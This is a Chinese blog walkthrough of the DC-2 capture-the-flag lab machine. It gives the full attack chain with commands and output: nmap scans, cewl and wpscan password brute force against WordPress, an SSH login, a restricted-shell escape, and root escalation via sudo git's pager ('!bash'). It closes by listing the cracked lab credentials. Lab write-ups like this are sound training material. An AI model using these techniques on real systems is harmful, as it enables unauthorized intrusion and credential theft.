DC-2 靶机渗透-CSDN博客

本文链接：https://blog.csdn.net/qq_44911239/article/details/119890443

DC-2靶机渗透
- 1. 渗透过程
!!!THE_ENT!!!
- 2. 重要信息

DC-2靶机渗透

1. 渗透过程

主机发现： nmap -sP 192.168.0.1/24
发现了DC-2的IP地址： 192.168.0.131
下载主机的时候要添加dns到hosts文件
echo “192.168.0.131 dc-2 ” >> /etc/hosts
添加好了 ping一下 dc-2，ping 通了表示成功了
接下来就是端口发现了：

nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131

结果：

# Nmap 7.70 scan initiated Mon Apr 27 14:28:47 2020 as: nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:F6:92:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.0.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 27 14:29:04 2020 -- 1 IP address (1 host up) scanned in 17.46 seconds

只有7744(ssh) 和 80 (http)
先看看http的
发现是一个 wordpress框架
还找到一个flag页面

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
#标志1：
#你通常的单词表可能不起作用，所以，也许你只需要试试cewl。
#密码越多越好，但有时你不能赢得所有的密码。
#作为一个登录以查看下一个标志。
#如果找不到，请以另一个身份登录。

提示是用 cewl 生成密码文件

cewl -w /tmp/passwd.lst http://dc-2

然后用这个密码来爆破
当然 wordpress 可以枚举用户名的

这里我们用wpscan来扫面

#先扫描用户
wpscan --url https://dc-2/ --enumerate u

找到用户名：

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

用户名：admin、jerry、tom
然后爆破其密码：(密码本就是刚刚我们用cewl生成的)

wpscan --url http://dc-2 --usernames admin,jerry,tom  --passwords  /tmp/passwd.lst

就扫面出来了两个密码

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

现在就是登陆后台拿shell了
当然知道点wordpress的都知道 http://dc-2/wp-admin/就能登录后台
不知道的爆破一下目录也可以哦
然后就随便登录了一个
在page里面发现了 flag 2

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
标志2：
如果你不能利用WordPress并抄近路，还有别的办法。
希望你能找到另一个切入点。

看了一圈，也用msf搞了一顿~
还是没能拿到shell
还有别的办法？
那只有ssh了
前面扫到ssh在7744端口
那我们就连用这两个网站密码连一下看看

ssh jerry@dc-2 -p 7744

发现登不进去权限不足？
再试试tom

ssh tom@dc-2 -p 7744

这个能登进去
但是~

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$
tom@DC-2:~$
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat
-rbash: cat: command not found
tom@DC-2:~$ sudo
-rbash: sudo: command not found

连cat都被限制了
只能搞到我的kali机器看看了
先看看有没有scp
有~

scp flag3.txt root@192.168.0.21:/tmp

然后输入以下密码就OK了

root@kali:/tmp# cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
#可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力而宽慰。

现在限制了好多命令，而且启的还是rbash echo $SHELL可以看当前使用的shell
那我们切换到bash看看行不

BASH_CMDS[a]=/bin/sh;a #(百度到这个可以还个零临时的用用)
# 换了之后还是没有命令？看看环境变量
echo $PATH
 /home/tom/usr/bin
export PATH=$PATH:/bin:/usr/bin
#自己设置一下环境变量
su jerry 	#切换到jerry

进了，还看到了flag4~
我们先看看flag4写的什么

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

大概意思就是说用git离开这里~
我们还是先看看history sudo -l ...这些命令

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

可以无密码使用root执行git
这个我也不咋会用
百度的到一个说是有个缓冲区漏洞
git 开启分页的时候可以输入命令启bash

jerry@DC-2:~$ sudo git -p config
usage: git config [options]

Config file location
    --global              use global config file
    --system              use system config file
    --local               use repository config file
    -f, --file <file>     use given config file
    --blob <blob-id>      read config from given blob object

Action
    --get                 get value: name [value-regex]
    --get-all             get all values: key [value-regex]
    --get-regexp          get values for regexp: name-regex [value-regex]
    --get-urlmatch        get value specific for the URL: section[.var] URL
    --replace-all         replace all matching variables: name value [value_regex]
    --add                 add a new variable: name value
    --unset               remove a variable: name [value-regex]
    --unset-all           remove all matches: name [value-regex]
    --rename-section      rename section: old-name new-name
    --remove-section      remove a section: name
    -l, --list            list all
    -e, --edit            open an editor
    --get-color <slot>    find the color configured: [default]
    --get-colorbool <slot>
                          find the color setting: [stdout-is-tty]
!bash
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry#

要记得把屏幕缩小来哦要不然就不会出现分页了~
这样就拿到了root权限了

root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a twet via @DCAU7.

!!!THE_ENT!!!

2. 重要信息

# 1. 网站后台密码
user1:tom
passwd:parturient
user2:jerry
passwd:adipiscing

# 后来在网站目录下搞到的
define('DB_NAME', 'wordpressdb');
/** MySQL database username */
define('DB_USER', 'wpadmin');

/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');